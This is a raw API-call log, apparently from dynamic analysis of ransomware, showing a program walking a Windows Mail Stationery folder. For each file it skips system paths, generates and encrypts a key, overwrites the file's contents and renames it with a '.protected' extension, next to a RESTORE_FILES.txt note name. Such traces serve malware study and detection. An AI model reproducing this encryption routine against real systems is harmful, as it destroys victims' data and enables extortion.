Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.542] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 79 [0094.542] StrStrW (lpFirst="Garden.htm", lpSrch=".txt") returned 0x0 [0094.542] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 79 [0094.542] StrStrW (lpFirst="Garden.htm", lpSrch=".rar") returned 0x0 [0094.542] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 79 [0094.542] StrStrW (lpFirst="Garden.htm", lpSrch=".zip") returned 0x0 [0094.542] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xe7, lpOverlapped=0x0) returned 1 [0094.543] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff19, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.543] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xe7, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xe7, lpOverlapped=0x0) returned 1 [0094.543] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.543] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.543] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.544] CloseHandle (hObject=0x150) returned 1 [0094.544] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.protected") returned 89 [0094.544] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm.protected")) returned 1 [0094.544] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.544] lstrcmpiW (lpString1="Garden.jpg", lpString2="Windows") returned -1 [0094.544] lstrcmpiW (lpString1="Garden.jpg", lpString2="Program Files") returned -1 [0094.544] lstrcmpiW (lpString1="Garden.jpg", lpString2="Program Files (x86)") returned -1 [0094.544] lstrcmpiW (lpString1="Garden.jpg", lpString2="$Recycle.bin") returned 1 [0094.544] lstrcmpiW (lpString1="Garden.jpg", lpString2="System Volume Information") returned -1 [0094.544] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 79 [0094.544] StrStrIW (lpFirst="Garden.jpg", lpSrch=".protected") returned 0x0 [0094.545] lstrcmpW 
(lpString1="Garden.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0094.545] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.545] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.545] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.546] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 79 [0094.546] StrStrW (lpFirst="Garden.jpg", lpSrch=".txt") returned 0x0 [0094.547] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 79 [0094.547] StrStrW (lpFirst="Garden.jpg", lpSrch=".rar") returned 0x0 [0094.547] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 79 [0094.547] StrStrW (lpFirst="Garden.jpg", lpSrch=".zip") returned 0x0 [0094.547] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0094.548] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.548] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, 
lpOverlapped=0x0) returned 1 [0094.548] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.548] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.550] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.550] CloseHandle (hObject=0x150) returned 1 [0094.550] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.protected") returned 89 [0094.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg.protected")) returned 1 [0094.550] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.551] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="Windows") returned -1 [0094.551] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="Program Files") returned -1 [0094.551] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="Program Files (x86)") returned -1 [0094.551] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="$Recycle.bin") returned 1 [0094.551] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="System Volume Information") returned -1 [0094.551] wnsprintfW (in: 
pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 86 [0094.551] StrStrIW (lpFirst="Green Bubbles.htm", lpSrch=".protected") returned 0x0 [0094.551] lstrcmpW (lpString1="Green Bubbles.htm", lpString2="RESTORE_FILES.txt") returned -1 [0094.551] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.551] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.551] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 86 [0094.551] StrStrW (lpFirst="Green Bubbles.htm", lpSrch=".txt") returned 0x0 [0094.551] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 86 [0094.551] StrStrW (lpFirst="Green Bubbles.htm", lpSrch=".rar") returned 0x0 [0094.551] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 86 [0094.551] StrStrW (lpFirst="Green Bubbles.htm", lpSrch=".zip") returned 0x0 [0094.551] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0094.552] SetFilePointerEx (in: 
hFile=0x150, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.552] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0094.552] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.552] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.552] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.552] CloseHandle (hObject=0x150) returned 1 [0094.552] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.protected") returned 96 [0094.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm.protected")) returned 1 [0094.553] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.553] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="Windows") returned -1 [0094.553] lstrcmpiW 
(lpString1="GreenBubbles.jpg", lpString2="Program Files") returned -1 [0094.553] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="Program Files (x86)") returned -1 [0094.553] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="$Recycle.bin") returned 1 [0094.553] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="System Volume Information") returned -1 [0094.553] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 85 [0094.553] StrStrIW (lpFirst="GreenBubbles.jpg", lpSrch=".protected") returned 0x0 [0094.553] lstrcmpW (lpString1="GreenBubbles.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0094.553] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.553] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.554] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 85 [0094.554] StrStrW (lpFirst="GreenBubbles.jpg", lpSrch=".txt") returned 0x0 [0094.554] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 85 [0094.554] StrStrW (lpFirst="GreenBubbles.jpg", lpSrch=".rar") returned 0x0 [0094.554] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Mail\\Stationery\\GreenBubbles.jpg") returned 85 [0094.554] StrStrW (lpFirst="GreenBubbles.jpg", lpSrch=".zip") returned 0x0 [0094.554] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x1906, lpOverlapped=0x0) returned 1 [0094.556] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe6fa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.556] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x1906, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x1906, lpOverlapped=0x0) returned 1 [0094.556] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.556] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.556] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.556] CloseHandle (hObject=0x150) returned 1 [0094.556] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.protected") returned 95 [0094.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Mail\\Stationery\\GreenBubbles.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg.protected")) returned 1 [0094.557] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.557] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="Windows") returned -1 [0094.557] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="Program Files") returned -1 [0094.557] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="Program Files (x86)") returned -1 [0094.557] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="$Recycle.bin") returned 1 [0094.557] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="System Volume Information") returned -1 [0094.557] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 84 [0094.557] StrStrIW (lpFirst="Hand Prints.htm", lpSrch=".protected") returned 0x0 [0094.557] lstrcmpW (lpString1="Hand Prints.htm", lpString2="RESTORE_FILES.txt") returned -1 [0094.557] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.557] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.558] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 84 [0094.558] 
StrStrW (lpFirst="Hand Prints.htm", lpSrch=".txt") returned 0x0 [0094.558] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 84 [0094.558] StrStrW (lpFirst="Hand Prints.htm", lpSrch=".rar") returned 0x0 [0094.558] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 84 [0094.558] StrStrW (lpFirst="Hand Prints.htm", lpSrch=".zip") returned 0x0 [0094.558] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xeb, lpOverlapped=0x0) returned 1 [0094.558] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff15, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.559] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xeb, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xeb, lpOverlapped=0x0) returned 1 [0094.559] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.559] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.559] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.559] CloseHandle (hObject=0x150) returned 1 [0094.559] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.protected") returned 94 
[0094.559] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm.protected")) returned 1 [0094.562] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.562] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="Windows") returned -1 [0094.562] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="Program Files") returned -1 [0094.562] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="Program Files (x86)") returned -1 [0094.562] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="$Recycle.bin") returned 1 [0094.562] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="System Volume Information") returned -1 [0094.562] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 83 [0094.562] StrStrIW (lpFirst="HandPrints.jpg", lpSrch=".protected") returned 0x0 [0094.562] lstrcmpW (lpString1="HandPrints.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0094.562] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.563] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.563] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 83 [0094.563] StrStrW (lpFirst="HandPrints.jpg", lpSrch=".txt") returned 0x0 [0094.563] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 83 [0094.563] StrStrW (lpFirst="HandPrints.jpg", lpSrch=".rar") returned 0x0 [0094.563] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 83 [0094.563] StrStrW (lpFirst="HandPrints.jpg", lpSrch=".zip") returned 0x0 [0094.563] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x107e, lpOverlapped=0x0) returned 1 [0094.565] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffef82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.565] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x107e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x107e, lpOverlapped=0x0) returned 1 [0094.565] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.565] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.565] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.565] CloseHandle (hObject=0x150) returned 1 [0094.565] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.protected") returned 93 [0094.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg.protected")) returned 1 [0094.566] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.566] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="Windows") returned -1 [0094.566] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="Program Files") returned -1 [0094.566] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="Program Files (x86)") returned -1 [0094.566] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="$Recycle.bin") returned 1 [0094.566] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="System Volume Information") returned -1 [0094.566] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 87 